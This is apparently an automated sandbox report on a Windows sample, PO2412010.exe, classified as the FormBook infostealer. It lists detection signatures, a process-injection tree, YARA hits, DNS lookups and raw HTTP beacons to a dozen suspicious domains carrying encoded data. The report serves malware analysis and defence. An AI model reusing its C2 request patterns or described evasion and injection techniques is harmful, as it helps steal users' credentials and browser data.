Windows Analysis Report
PO2412010.exe

Overview

General Information

Sample name:PO2412010.exe
Analysis ID:1572437
MD5:60abe4a88d6c409a3a4770cef13c0222
SHA1:ccdd09a372d79f68b96af483caf946fa9b552c56
SHA256:cd676542bbeac4ff5dea88783c4e93b89971bdf60eaa04128f1d36078a4c2ad4
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO2412010.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\PO2412010.exe" MD5: 60ABE4A88D6C409A3A4770CEF13C0222)
    • PO2412010.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\PO2412010.exe" MD5: 60ABE4A88D6C409A3A4770CEF13C0222)
      • duvyEsVvTpq.exe (PID: 6740 cmdline: "C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7836 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • duvyEsVvTpq.exe (PID: 5804 cmdline: "C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8080 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.PO2412010.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.PO2412010.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

                AV Detection

                Source: PO2412010.exe, ReversingLabs: Detection: 36%
                Source: Yara match, File source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: PO2412010.exe, Joe Sandbox ML: detected
                Source: PO2412010.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO2412010.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdb source: PO2412010.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: duvyEsVvTpq.exe, 00000005.00000002.3828968792.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1877721836.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO2412010.exe, PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdbSHA256y ] source: PO2412010.exe
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 6_2_0263C4E0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0263C4E0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then xor eax, eax; 6_2_02629E40
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then mov ebx, 00000004h; 6_2_048C04F8

                Networking

                Source: DNS query: www.cyperla.xyz
                Source: DNS query: www.070002018.xyz
                Source: Joe Sandbox View, IP Address: 101.35.209.183
                Source: Joe Sandbox View, IP Address: 146.88.233.115
                Source: Joe Sandbox View, IP Address: 161.97.142.144
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 10 Dec 2024 14:15:50 GMTserver: Apacheset-cookie: __tad=1733840150.1472258; expires=Fri, 08-Dec-2034 14:15:50 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 10 Dec 2024 14:15:52 GMTserver: Apacheset-cookie: __tad=1733840152.4262799; expires=Fri, 08-Dec-2034 14:15:52 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 10 Dec 2024 14:15:55 GMTserver: Apacheset-cookie: __tad=1733840155.5395960; expires=Fri, 08-Dec-2034 14:15:55 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: close
                Source: global trafficHTTP traffic detected: GET /qygv/?x2q=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wx4OEfkkKpQI8CokgLA8hMMnOvrVSxnOjJsU=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iP4/fNUbperoympu86OQyU69q5Nwob6N2bh/8=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY= HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?x2q=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9khdU1gh7QaWeiWgu/JIX+7JexMxtriwWCLY0=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8m07/?x2q=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrHP/N37p6QmtlKoXALFEyxzy3Eq+MEUnkUgU=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.goldstarfootwear.shopAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6m2n/?x2q=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0/9t4uQ02LXci5FVUlLJ03efKQM1irr8PMPM=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.070002018.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7yhf/?x2q=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGr5qIxSDZKvplZ+L2zC6/y242QbNTV2zLWhg0=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.bienmaigrir.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wu7k/?x2q=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVPv+PT22eq81M1kOVVHAZEZoSUQiJLk0TbwLs=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.yc791022.asiaAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ykgd/?x2q=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/h7/Kfsz1ox4b0pkaI3y+ymEAIYvakOAEmGE=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.jalan2.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fbpt/?x2q=sHQWWiJRbY7Czg+pdBTXnWo2YpYQcCCmWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqwsClZu7js/9F2ASp2jrUizXePexmAjexZLZ0=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.beyondfitness.liveAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dm4p/?Gn6D=5fNLN8qhqB3P&x2q=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AiTCMhthfFHlaAoSHmNs0Z/b09PqcCq4Db34= HTTP/1.1Host: www.dietcoffee.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qtfx/?x2q=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLbzmLeHv/c15PEmolRusqu0oXm0K1+tUNhxI=&Gn6D=5fNLN8qhqB3P HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                Source: global trafficDNS traffic detected: DNS query: www.070002018.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bienmaigrir.info
                Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.alihones.lol
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 200Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 10 Dec 2024 14:15:16 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 14:16:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e3k1jGkXHYr2mbcEMjdUKLdym47sePCCdWZsHt2B1U3UDex2h1PFiJQbB7LyYmJIg7Ge2C1JP8%2FemeCBnsMA9v1N7BwQFZrMZ699eNRkAsFjN0YAUUrovZYMLqlk%2BAXk9dRxiI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8efdd9c6dea04339-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=626&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 14:16:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYQ7OLcAqachO2eLg4OMhNo8wSHrXFI%2BSE5ShEEY8xNNWoVq8jk4x%2Fc9EzmvpbS5Xz6a8xylG9u4O1TYcMeBHdB9wPDnWkrfkse3NuASIUW7U1MgAbmAquEDaOQxab3eb9bu4YE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8efdd9d83fdf7277-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1954&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=646&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 14:16:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LiloxfpW4ofiRgL9dZ112j%2FhxE0aGmEmOsDmQ8dzJrFpTKtzrtkFk3VdY92kv0%2Bt6w9Bi9heaMVTQYNh5N9XESqEO909xY3RGxN8GmQfdM1cEH7pnohM3lOfSbFUMyO988V09ak%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8efdd9e8ee914339-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1659&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 14:16:13 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mjJesKHa8E3doiFRZ2guS%2ByCTAbJxKN9hZsC29m9A14i4gCTlLv%2BCmV03c3QdUGbEferlbX8lvA48TKrsvFN0QP0by876%2Fi3kPxLDOvDmYNOZ7G8TXB6qHk5J6BRLCEKzYNSnW4%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8efdd9fa8ae27277-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2022&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=360&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome fr
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:16:35 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                ETag: W/"66cce1df-b96"
                Content-Encoding: gzip
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:16:38 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                ETag: W/"66cce1df-b96"
                Content-Encoding: gzip
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:16:41 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                ETag: W/"66cce1df-b96"
                Content-Encoding: gzip
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:16:44 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 2966
                Connection: close
                Vary: Accept-Encoding
                ETag: "66cce1df-b96"
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:16:53 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:16:56 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:16:59 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 10 Dec 2024 14:17:01 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 14:17:09 GMT
                Server: Apache
                Content-Length: 263
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 14:17:12 GMT
                Server: Apache
                Content-Length: 263
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 10 Dec 2024 14:17:17 GMT
                Server: Apache
                Content-Length: 263
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                content-type: text/html
                cache-control: private, no-cache, max-age=0
                pragma: no-cache
                date: Tue, 10 Dec 2024 14:17:24 GMT
                server: LiteSpeed
                content-encoding: gzip
                vary: Accept-Encoding
                transfer-encoding: chunked
                connection: close
                Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                Data Ascii: a
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                content-type: text/html
                cache-control: private, no-cache, max-age=0
                pragma: no-cache
                date: Tue, 10 Dec 2024 14:17:27 GMT
                server: LiteSpeed
                content-encoding: gzip
                vary: Accept-Encoding
                transfer-encoding: chunked
                connection: close
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                content-type: text/html
                cache-control: private, no-cache, max-age=0
                pragma: no-cache
                date: Tue, 10 Dec 2024 14:17:29 GMT
                server: LiteSpeed
                content-encoding: gzip
                vary: Accept-Encoding
                transfer-encoding: chunked
                connection: close
                Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                Data Ascii: a
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                content-type: text/html
                cache-control: private, no-cache, max-age=0
                pragma: no-cache
                content-length: 1249
                date: Tue, 10 Dec 2024 14:17:32 GMT
                server: LiteSpeed
                connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 10 Dec 2024 14:17:39 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 10 Dec 2024 14:17:41 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
